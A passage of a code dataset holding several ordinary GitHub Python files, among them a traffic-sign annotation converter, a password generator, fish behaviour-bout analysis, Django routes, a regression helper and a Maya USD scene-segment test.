ymin = doc.createElement('ymin')\n ymin_text = doc.createTextNode(str(bbox_ymin))\n xmax = doc.createElement('xmax')\n xmax_text = doc.createTextNode(str(bbox_xmax))\n ymax = doc.createElement('ymax')\n ymax_text = doc.createTextNode(str(bbox_ymax))\n object.appendChild(name)\n name.appendChild(name_text)\n object.appendChild(pose)\n pose.appendChild(pose_text)\n object.appendChild(truncated)\n truncated.appendChild(truncated_text)\n object.appendChild(difficult)\n difficult.appendChild(difficult_text)\n object.appendChild(bndbox)\n bndbox.appendChild(xmin)\n xmin.appendChild(xmin_text)\n bndbox.appendChild(ymin)\n ymin.appendChild(ymin_text)\n bndbox.appendChild(xmax)\n xmax.appendChild(xmax_text)\n bndbox.appendChild(ymax)\n ymax.appendChild(ymax_text)\n annotation.appendChild(object)\n fp = open(xml_path + '%s.xml' % img_name, 'w+')\n doc.writexml(fp, indent='\\t', addindent='\\t', newl='\\n', encoding='utf-8')\n # print(annos[\"imgs\"][img_name]['objects'])\n fp.close()\n\n def coco_json2yolo_txt(self, class_json):\n # COCO 格式的数据集转化为 YOLO 格式的数据集\n # --json_path 输入的json文件路径\n # --save_path 保存的文件夹名字,默认为当前目录下的labels。\n\n\n parser = argparse.ArgumentParser()\n # 这里根��自己的json文件位置,换成自己的就行\n parser.add_argument('--json_path',\n default='E:/dataset/tt100k_2021/data/dataset/annotations/train.json',\n type=str, help=\"input: coco format(json)\")\n # 这里设置.txt文件保存位置\n parser.add_argument('--save_path', default='E:/dataset/tt100k_2021/data/dataset/annotations/', type=str,\n help=\"specify where to save the output dir of labels\")\n arg = parser.parse_args()\n\n\n def convert(size, box):\n dw = 1. / (size[0])\n dh = 1. / (size[1])\n x = box[0] + box[2] / 2.0\n y = box[1] + box[3] / 2.0\n w = box[2]\n h = box[3]\n # round函数确定(xmin, ymin, xmax, ymax)的小数位数\n x = round(x * dw, 6)\n w = round(w * dw, 6)\n y = round(y * dh, 6)\n h = round(h * dh, 6)\n return (x, y, w, h)\n\n # class_json = 'train'\n json_file = os.path.join(\n 'E:/dataset/tt100k_2021/data/dataset/annotations/%s.json' % class_json) # COCO Object Instance 类型的标注\n # ana_txt_save_path = 'D:/jinxData/TT100K/data/dataset/annotations/train' # 保存的路径\n ana_txt_save_path = os.path.join('E:/dataset/tt100k_2021/data/dataset/annotations', class_json) # 保存的路径\n\n data = json.load(open(json_file, 'r'))\n if not os.path.exists(ana_txt_save_path):\n os.makedirs(ana_txt_save_path)\n\n id_map = {} # coco数据集的id不连续!重新映射一下再输出!\n with open(os.path.join(ana_txt_save_path, 'classes.txt'), 'w') as f:\n # 写入classes.txt\n for i, category in enumerate(data['categories']):\n f.write(f\"{category['name']}\\n\")\n id_map[category['id']] = i\n # print(id_map)\n # 这里需要根据自己的需要,更改写入图像相对路径的文件位置。\n list_file = open(os.path.join(ana_txt_save_path, '%s.txt' % class_json.format()), 'w')\n for img in tqdm(data['images']):\n filename = img[\"file_name\"]\n img_width = img[\"width\"]\n img_height = img[\"height\"]\n img_id = img[\"id\"]\n head, tail = os.path.splitext(filename)\n ana_txt_name = head + \".txt\" # 对应的txt名字,与jpg一致\n f_txt = open(os.path.join(ana_txt_save_path, ana_txt_name), 'w')\n for ann in data['annotations']:\n if ann['image_id'] == img_id:\n box = convert((img_width, img_height), ann[\"bbox\"])\n f_txt.write(\"%s %s %s %s %s\\n\" % (id_map[ann[\"category_id\"]], box[0], box[1], box[2], box[3]))\n f_txt.close()\n # 将图片的相对路径写入train2017或val2017的路径\n list_file.write('/%s/%s.jpg\\n' % (class_json.format(), head))\n list_file.close()\n\n def divide_TrainValTest(self, source, target):\n '''\n 创建文件路径\n :param source: 源文件位置\n :param target: 目标文件位置\n '''\n for i in ['train', 'val', 'test']:\n path = target + '/' + i\n if not os.path.exists(path):\n os.makedirs(path)\n\n # 遍历目录下的文件名,复制对应的图片到指定目录\n for root, dirs, files in os.walk(source):\n for file in files:\n file_name = os.path.splitext(file)[0]\n image_path = os.path.join(file_name + '.jpg')\n # print(source)\n if 'train' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/train/' + image_path)\n elif 'val' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/val/' + image_path)\n elif 'test' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/test/' + image_path)\n\n def xml2txt(self):\n # coding:utf-8\n\n parser = argparse.ArgumentParser()\n # xml文件的地址,根据自己的数据进行修改 xml一般存放在Annotations下\n parser.add_argument('--xml_path', default='xml', type=str, help='input xml label path')\n # 数据集的划分,地址选择自己数据下的ImageSets/Main\n parser.add_argument('--txt_path', default='dataSet', type=str, help='output txt label path')\n opt = parser.parse_args()\n\n trainval_percent = 1.0\n train_percent = 0.9\n xmlfilepath = opt.xml_path\n txtsavepath = opt.txt_path\n total_xml = os.listdir(xmlfilepath)\n if not os.path.exists(txtsavepath):\n os.makedirs(txtsavepath)\n\n num = len(total_xml)\n list_index = range(num)\n tv = int(num * trainval_percent)\n tr = int(tv * train_percent)\n trainval = random.sample(list_index, tv)\n train = random.sample(trainval, tr)\n\n file_trainval = open(txtsavepath + '/trainval.txt', 'w')\n file_test = open(txtsavepath + '/test.txt', 'w')\n file_train = open(txtsavepath + '/train.txt', 'w')\n file_val = open(txtsavepath + '/val.txt', 'w')\n\n for i in list_index:\n name = total_xml[i][:-4] + '\\n'\n if i in trainval:\n file_trainval.write(name)\n if i in train:\n file_train.write(name)\n else:\n file_val.write(name)\n else:\n file_test.write(name)\n\n file_trainval.close()\n file_train.close()\n file_val.close()\n file_test.close()\n\n\nif __name__ == '__main__':\n tt100k = TT100K2COCO()\n #tt100k.class_statistics()\n #tt100k.original_datasets2object_datasets_re()\n #tt100k.coco_json2yolo_txt('train')\n #tt100k.coco_json2yolo_txt('test')\n #tt100k.coco_json2yolo_txt('val')\n\n tt100k.divide_TrainValTest('E:/dataset/tt100k_2021/data/dataset/annotations/val', 'E:/dataset/tt100k_2021/data')\n","repo_name":"Truoji/yolov5s-jtbz-npu","sub_path":"jtbz/tt100k2yolo.py","file_name":"tt100k2yolo.py","file_ext":"py","file_size_in_byte":26182,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"27089620979","text":"import string\nimport random\n\nprint('\\n Gerador de senhas \\n')\ns1 = list(string.ascii_lowercase)\ns2 = list(string.ascii_uppercase)\ns3 = list(string.digits)\ns4 = list(string.punctuation)\n\nwhile True:\n try:\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n quantidade_caracteres = int(escolha_usuario)\n print('Escolha uma opcao: ')\n print('1-Senha basica')\n print('2-Senha forte')\n print('3-Mais informacoes')\n escolha_usuario2 = int(input(''))\n if escolha_usuario2 == 3:\n print('Senha basica: Letras maiusculas, minusculas e numeros')\n print('Senha Forte: Letras maiusculas e minusculas, numeros e simbolos')\n escolha_usuario2 = int(input('Agora escolha uma opcao: '))\n elif escolha_usuario2 > 3 or escolha_usuario2 < 1:\n print('Opcao invalida')\n escolha_usuario2 = int(input('Escolha uma opcao valida: '))\n \n\n if quantidade_caracteres < 5:\n print('A senha deve ter no minimo 5 caracter')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n elif quantidade_caracteres > 52:\n print('A senha nao pode ter mais de 52 caracteres')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n else:\n break\n except ValueError:\n print('Digite apenas numeros')\n\ndef senha_basica():\n random.shuffle(s1)\n random.shuffle(s2)\n part1 = round(quantidade_caracteres * (40/100))\n part2 = round(quantidade_caracteres * (40/100))\n part3 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n \n for x in range(part2):\n resultado.append(s2[x])\n\n for x in range(part3):\n resultado.append(s3[x])\n \n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\ndef senha_forte():\n #emabralhar tudo\n random.shuffle(s1)\n random.shuffle(s2)\n random.shuffle(s3)\n random.shuffle(s4)\n\n part1 = round(quantidade_caracteres * (30/100))\n part2 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n resultado.append(s2[x])\n\n for x in range(part2):\n resultado.append(s3[x])\n resultado.append(s4[x])\n\n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\nif escolha_usuario2 == 1:\n senha_basica()\nelif escolha_usuario2 == 2:\n senha_forte()","repo_name":"CaueConte/gerador-de-senhas","sub_path":"codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34555640660","text":"import numpy as np\nimport pandas as pd\n\nfrom cichlidanalysis.analysis.processing import threshold_data\n\n\ndef find_bout_start_ends(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bout_start_ends_inclusive(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n Includes streches which are at the edge\n\n :param bout_array:\n :return: bout_start, bout_end\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = (np.asarray(np.where(changes == 1)) + 1)[0]\n bout_end = (np.asarray(np.where(changes == -1)) + 1)[0]\n\n # determine if array ends with a bout\n if bout_array[-1] == 1:\n # if so add in a end\n bout_end = np.concatenate((bout_end, np.array([len(bout_array)])), axis=0)\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, add first bout as it is incomplete\n bout_start = np.concatenate((np.array([0]), bout_start), axis=0)\n\n return bout_start, bout_end\n\n\ndef bout_speeds(bout_array, speed):\n \"\"\" For each bout (1 in array, not a zero, assumes no NaNs in data), find the speed of that bout\n :param bout_array:\n :param speed:\n :return: speed_active, bout_max, bout_speed\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find global speed within active bouts\n speed_active = speed[bout_array > 0.5]\n\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout, find the max speed\n bout_max = np.zeros(bout_start.shape[0])\n for bout_n in np.linspace(0, bout_number - 1, bout_number):\n bout_max[int(bout_n)] = np.max(speed[bout_start[int(bout_n)]:(bout_start[int(bout_n)] + bout_lengths[int(bout_n)])])\n\n return speed_active, bout_max\n\n\ndef triggered_bout_speed(bout_array, speed, pre, post):\n \"\"\" for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n :param bout_array\n :param speed\n :param pre\n :param post\n :return: trig_bout_spd\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n trig_bout_spd = np.empty([bout_start.shape[0], np.max(bout_lengths)]) # max(bout_lengths)+15]) # fps*10])\n trig_bout_spd[:] = np.nan\n\n for bout in np.linspace(0, bout_number - 1, bout_number):\n # extract out speed data from \"pre\" time points before to \"post\" time points after.\n if ((bout_start[int(bout)] - pre) > 0) & ((bout_start[int(bout)] + post) < speed.shape[0]):\n trig_bout_spd[int(bout), 0:(pre + post)] = (speed[(bout_start[int(bout)] - pre):(bout_start[int(bout)]\n + post)]).reshape(pre + post)\n\n return trig_bout_spd\n\n\ndef find_bouts(speed, threshold):\n \"\"\" Finds active and quiescent bouts, including where they start, how long they are etc\n :param speed (smoothed)\n :param threshold: speed threshold to determine active/quiescent\n :return: active_bout_lengths, active_bout_end_t, active_bout_start_t, quiescent_bout_lengths, quiescent_bout_end_t,\n quiescent_bout_start_t, active_bout_max\n\n assume no NaNs??\n \"\"\"\n # improvements to do: deal with nans in the middle of data\n # one way to do that would be to break apart blocks at NaNs. So there would be a loop to add in uninterrupted blocks\n # need to keep track and accumulate blocks in same category (e.g. night)\n\n active_indices = threshold_data(speed, threshold)\n inactive_indices = (active_indices != 1) * 1\n\n # for active\n active_bout_start, active_bout_end, active_bout_lengths = find_bout_start_ends(active_indices)\n active_speed, active_bout_max = bout_speeds(active_indices, speed)\n\n # for inactive\n inactive_bout_start, inactive_bout_end, inactive_bout_lengths = find_bout_start_ends(inactive_indices)\n inactive_speed, inactive_bout_max = bout_speeds(inactive_indices, speed)\n\n return active_bout_lengths, active_bout_end, active_bout_start, inactive_bout_lengths, inactive_bout_end, \\\n inactive_bout_start, active_speed, active_bout_max, active_indices, inactive_speed, inactive_bout_max, \\\n inactive_indices\n\n\ndef find_bout_start_ends_pd(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run find_bout_start_ends_pd\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bouts_input(fish_tracks_i, change_times_m, measure='rest'):\n \"\"\" Finds active and inactive bouts, including where they start, how long they are etc\n :param fish_tracks_i:\n :param measure: what to measure in the fish_tracks\n :return: fish_bouts: a dataframe with time stamps of start and ends of \"1\" or \"True\" bouts in the given data.\n \"\"\"\n fishes = fish_tracks_i['FishID'].unique()\n first = True\n\n for fish in fishes:\n all_bout_starts = pd.Series()\n all_bout_ends = pd.Series()\n\n # get individual fish\n fish_tracks_f = fish_tracks_i[fish_tracks_i.FishID == fish][['ts', measure]]\n\n # check if there are NaNs\n if np.max(np.isnan(fish_tracks_f.iloc[:, 1])):\n # break up NaN stretches\n non_nan_array = abs(((np.isnan(fish_tracks_f.iloc[:, 1])) * 1)-1)\n non_nan_array = non_nan_array.to_numpy()\n data_start, data_end = find_bout_start_ends_inclusive(non_nan_array)\n else:\n data_start, data_end = [0], [len(fish_tracks_f)]\n\n for strech_n in np.arange(0, len(data_start)):\n # calulate data stretches starts and ends\n data_stretch = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 1]\n data_stetch_ts = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0]\n bout_start, bout_end, _ = find_bout_start_ends(data_stretch.to_numpy())\n # add the time stamps of found starts and ends to pd.Series\n all_bout_starts = pd.concat([all_bout_starts.reset_index(drop=True), data_stetch_ts.iloc[bout_start].\n reset_index(drop=True)])\n all_bout_ends = pd.concat([all_bout_ends.reset_index(drop=True), data_stetch_ts.iloc[bout_end].\n reset_index(drop=True)])\n\n # import matplotlib.pyplot as plt\n # plt.plot(fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0], data_stretch)\n # plt.scatter(all_bout_starts, np.zeros([1, len(all_bout_starts)]), color='r')\n # plt.scatter(all_bout_ends, np.zeros([1, len(all_bout_starts)]), color='b')\n\n # find bout lengths for measure and nonmeasure\n all_bout_measure_lengths = all_bout_ends - all_bout_starts\n all_bout_nonmeasure_lengths = all_bout_starts.to_numpy()[1:] - all_bout_ends.to_numpy()[0:-1]\n\n # make fish_bouts df\n fish_bouts_i = pd.concat([all_bout_starts.reset_index(drop=True), all_bout_ends.reset_index(drop=True),\n all_bout_measure_lengths.reset_index(drop=True), pd.Series(all_bout_nonmeasure_lengths)],\n axis=1)\n fish_bouts_i.columns = ['bout_start', 'bout_end', measure + '_len', 'non' + measure + '_len']\n fish_bouts_i['FishID'] = fish\n\n # combine with the other fish\n if first:\n fish_bouts = fish_bouts_i\n first = False\n else:\n fish_bouts = pd.concat([fish_bouts, fish_bouts_i], axis=0)\n\n fish_bouts = fish_bouts.reset_index(drop=True)\n\n # add new column with Day or Night\n fish_bouts['time_of_day_m'] = fish_bouts.bout_start.apply(lambda row: int(str(row)[11:16][:-3]) * 60 +\n int(str(row)[11:16][-2:]))\n\n fish_bouts['daynight'] = \"d\"\n fish_bouts.loc[fish_bouts.time_of_day_m < change_times_m[0], 'daynight'] = \"n\"\n fish_bouts.loc[fish_bouts.time_of_day_m > change_times_m[3], 'daynight'] = \"n\"\n\n fish_bouts[\"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n fish_bouts.loc[fish_bouts['FishID'] == fish, \"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n\n return fish_bouts\n\n\ndef names_bouts():\n data_names = ['spd_mean', 'move_mean', 'rest_mean', 'y_mean', 'spd_std', 'move_std', 'rest_std', 'y_std',\n 'move_bout_mean', 'nonmove_bout_mean', 'rest_bout_mean', 'nonrest_bout_mean', 'move_bout_std',\n 'nonmove_bout_std', 'rest_bout_std', 'nonrest_bout_std']\n time_v2_m_names = ['predawn', 'dawn', 'day', 'dusk', 'postdusk', 'night']\n\n spd_means = ['spd_mean_predawn', 'spd_mean_dawn', 'spd_mean_day', 'spd_mean_dusk', 'spd_mean_postdusk',\n 'spd_mean_night']\n rest_means = ['rest_mean_predawn', 'rest_mean_dawn', 'rest_mean_day', 'rest_mean_dusk', 'rest_mean_postdusk',\n 'rest_mean_night']\n move_means = ['move_mean_predawn', 'move_mean_dawn', 'move_mean_day', 'move_mean_dusk', 'move_mean_postdusk',\n 'move_mean_night']\n rest_b_means = ['rest_bout_mean_predawn', 'rest_bout_mean_dawn', 'rest_bout_mean_day', 'rest_bout_mean_dusk',\n 'rest_bout_mean_postdusk', 'rest_bout_mean_night']\n nonrest_b_means = ['nonrest_bout_mean_predawn', 'nonrest_bout_mean_dawn', 'nonrest_bout_mean_day',\n 'nonrest_bout_mean_dusk',\n 'nonrest_bout_mean_postdusk', 'nonrest_bout_mean_night']\n move_b_means = ['move_bout_mean_predawn', 'move_bout_mean_dawn', 'move_bout_mean_day', 'move_bout_mean_dusk',\n 'move_bout_mean_postdusk', 'move_bout_mean_night']\n nonmove_b_means = ['nonmove_bout_mean_predawn', 'nonmove_bout_mean_dawn', 'nonmove_bout_mean_day',\n 'nonmove_bout_mean_dusk',\n 'nonmove_bout_mean_postdusk', 'nonmove_bout_mean_night']\n\n # movement_bouts = ['move_bout_mean', 'nonmove_bout_mean', 'move_bout_std']\n # rest_bouts = ['rest_bout_mean', 'nonrest_bout_mean']\n\n return data_names, time_v2_m_names, spd_means, rest_means, move_means, rest_b_means, nonrest_b_means, move_b_means, nonmove_b_means\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"annnic/cichlid-analysis","sub_path":"cichlidanalysis/analysis/bouts.py","file_name":"bouts.py","file_ext":"py","file_size_in_byte":14474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71202604488","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('about/', views.about, name='about'),\n path('property/', views.proPerty, name=\"property\"),\n path('property_single', views.property, name=\"propertySingle\"),\n path('agents/', views.agent, name=\"agents\"),\n path('agents_single/', views.agentSingle, name=\"agentSinge\"),\n path('blog/', views.blog, name=\"blog\"),\n path('blog_single/', views.blogSingle, name=\"blogSingle\"),\n path('contact/', views.contact, name=\"contact\"),\n]","repo_name":"koueAnicet/immobilier","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13820552981","text":"liczby = []\n\nwhile len(liczby) != 10:\n wpis = input(f'Podaj liczbe numer {len(liczby)+1}: ')\n if wpis == 'koniec':\n break\n else:\n liczby.append(float(wpis))\n\nprint(f'Srednia wartosc liczb to: {sum(liczby)/len(liczby)}')","repo_name":"konradmaleckipl/python_bootcamp_20180825","sub_path":"zjazd2/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37115490394","text":"from matplotlib.ticker import PercentFormatter\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels . api as sm\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\ndef plotbar(P,string):\r\n for e in P:\r\n plt.bar(e[0],e[1])\r\n plt.xticks(rotation=90)\r\n plt.savefig(\"TEST\"+string+\".png\")\r\n\r\ndef plotCAPM(Stocks,Market,OLSResult,Subset,String):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/img/testCAPM/\"\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n myint=iter(Subset.columns)\r\n for e,OLSRes in zip(Stocks,OLSResult):\r\n str=next(myint).strip()\r\n plt.figure()\r\n plt.plot(Market, OLSRes.iloc[1][0]*Market+OLSRes.iloc[0][1])\r\n plt.scatter(Market,e)\r\n plt . xlabel ('Eurostoxx')\r\n plt . ylabel (str)\r\n plt.savefig(\"img/testCAPM/CAPM-\"+str+String+\".png\")\r\n plt.close()\r\n\r\n\r\ndef plotscatter(setx,sety,title,xlabel,ylabel,sigla,Subset,string_to_save):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/\"+string_to_save\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n \r\n myint=iter(Subset.columns)\r\n for e in sety:\r\n str=next(myint)\r\n plt.figure()\r\n plt.scatter(setx,e)\r\n plt.title(title)\r\n plt . xlabel (xlabel)\r\n plt . ylabel (str+ylabel)\r\n plt.savefig(folder+\"/\"+sigla+\"-\"+str+\".png\")\r\n plt.close()\r\n \r\n\r\n\r\ndef OLS(Stock_Risk_Free,Market,printSummary=False):\r\n Res= []\r\n X = np . column_stack (( np . ones_like ( Market ) , Market ))\r\n try:\r\n Stock_Risk_Free.shape[1]\r\n for e,i in zip(Stock_Risk_Free,range(0,len(Stock_Risk_Free))):\r\n df = sm . OLS ( e[1:] , X[1:] ). fit ()\r\n Res.append(pd.read_html(df.summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n if printSummary:\r\n with open('summary'+str(i)+'.txt', 'w') as fh:\r\n fh.write(df.summary().as_html())\r\n except:\r\n Res.append(pd.read_html(sm . OLS ( Stock_Risk_Free[1:], X[1:] ). fit ().summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n \r\n \r\n return Res\r\n\r\ndef ReorderByOLSParam(Stocks,Subset,Row_interess,Coloum_interess):\r\n \"\"\"\r\n Function return stock reorder by OLS result\r\n Row_interess -> choose row of OLS Summary between\r\n Const=0, X1=1\r\n\r\n Coloum_interess-> choose coloum of OLS summary between\r\n coef=0 std err=1 t=2 P>|t|=3 0.025=4 0.975=5 \r\n \"\"\" \r\n P = {}\r\n myint=iter(Subset.columns)\r\n for e in Stocks:\r\n P[next(myint)]=e.iloc[Row_interess][Coloum_interess]\r\n return sorted(P.items(), key=lambda x:x[1])\r\n","repo_name":"RiccardoForni/Regression_Project","sub_path":"Project - Mazzolin, Forni, Dian, Lavarello/Regre_Function.py","file_name":"Regre_Function.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34331953708","text":"import fixturesUtils\nimport mayaUtils\nimport testUtils\nimport ufeUtils\n\nfrom maya import cmds\nfrom maya import standalone\n\nimport ufe\n\nimport os\nimport unittest\n\nclass SceneSegmentTestCase(unittest.TestCase):\n '''Verify the Scene Segment UFE interface, for multiple runtimes.\n \n UFE Feature : ProxyShape, stage nesting\n Maya Feature : ProxyShape\n Action : query scene segments\n '''\n\n pluginsLoaded = False\n \n @classmethod\n def setUpClass(cls):\n fixturesUtils.readOnlySetUpClass(__file__, loadPlugin=False)\n\n if not cls.pluginsLoaded:\n cls.pluginsLoaded = mayaUtils.isMayaUsdPluginLoaded()\n\n @classmethod\n def tearDownClass(cls):\n standalone.uninitialize()\n\n def setUp(self):\n ''' Called initially to set up the maya test environment '''\n # Load plugins\n self.assertTrue(self.pluginsLoaded)\n\n # load the file and get ready to test!\n cmds.file(force=True, new=True)\n mayaUtils.loadPlugin(\"mayaUsdPlugin\")\n testFile = testUtils.getTestScene(\"camera\", 'TranslateRotate_vs_xform.usda')\n mayaUtils.createProxyFromFile(testFile)\n globalSelection = ufe.GlobalSelection.get()\n globalSelection.clear()\n\n def testProxyShapeSceneSegmentHandler(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n camerasParentPath = ufe.PathString.path('|stage|stageShape,/cameras')\n\n # searching on a gateway item should give all gateway nodes in the child segment.\n # USD doesn't have any gateway nodes, so the result should be empty\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n # searching the the parent of a gateway item searches the Maya scene segment\n # for gateway nodes without recursing into USD. should be the proxy shape\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n # searching for the USD parent of both cameras should find no scene segment handler\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(camerasParentPath.runTimeId())\n self.assertEqual(handler, None)\n\n @unittest.skipUnless(ufeUtils.ufeFeatureSetVersion() >= 4, 'Test for UFE v4 or later')\n def testFilteredFindGatewayItems(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n\n # Searching on a gateway item should give all gateway nodes in\n # the child segment. USD doesn't have any gateway nodes, so the\n # result should be empty. When using the filtered version of\n # `findGatewayItems()`, the result should still be empty.\n # Filtering can never increase the cardinality of the result.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n usdRunTimeId = ufe.RunTimeMgr.instance().getId('USD')\n result = handler.findGatewayItems(proxyShapePath, usdRunTimeId)\n self.assertTrue(result.empty())\n\n otherRunTimeId = 6174\n result = handler.findGatewayItems(proxyShapePath, otherRunTimeId)\n self.assertTrue(result.empty())\n\n # Searching from the parent of a gateway item searches the Maya\n # scene segment for gateway nodes without recursing into USD.\n # If no filter is specified or if the USD runtime ID is used as\n # a filter, this should return the proxy shape. If a different\n # runtime ID is used as a filter, the result should be empty.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, usdRunTimeId)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertTrue(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, otherRunTimeId)\n self.assertTrue(result.empty())\n\nif __name__ == '__main__':\n 